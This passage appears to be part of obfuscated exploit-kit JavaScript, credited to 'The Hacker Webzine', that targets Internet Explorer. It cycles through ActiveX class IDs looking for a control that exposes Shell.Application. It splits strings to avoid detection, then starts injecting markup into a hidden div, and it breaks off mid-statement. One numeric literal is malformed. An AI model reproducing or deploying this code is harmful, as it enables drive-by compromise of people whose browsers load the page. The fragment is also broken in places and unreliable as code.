    // Loop ends at the trailing null entry.
    while(z1IlbpFl0X[ z1IlbEFl0X] ) {
        var z1IlbFFl0X = null;
        z1IlbFFl0X = document.createElement("objec" + "t");
        z1IlbFFl0X.setAttribute("clas" + "sid", "clsi" + "d:"
+ z1IlbpFl0X[ z1IlbEFl0X] .substring(1, z1IlbpFl0X[ z1IlbEFl0X] .length - 1));
        if(z1IlbFFl0X) {
            try {
                // Probe: can this control hand us Shell.Application?
                var z1IlcvFl0X = x0r1aW2Z(z1IlbFFl0X, "S" + "hell." + "Application");
                if(z1IlcvFl0X) {
                    z1IlctFl0X = z1IlEFl0X(z1IlbFFl0X);
                    return z1IlctFl0X;

                }
            }
            catch(e) {}
        }
        z1IlbEFl0X++;

    }
    return false;

};

function z1IlNFl0X() {
    if(z1IlbCFl0X > 0) {
        return false;

    }
    if(z1IlaxFl0X) {
        return true;

    }
    if(z1IlaKFl0X == 0) {
        return false;

    }
    if(z1IlaKFl0X > 0 x730) {
        return false;

    }
    z1IltFl0X();
    if(z1IlaAFl0X == "ie") {
        document.getElementById("tmp_d" + "iv1").innerHTML = "

Source: The Hacker Webzine
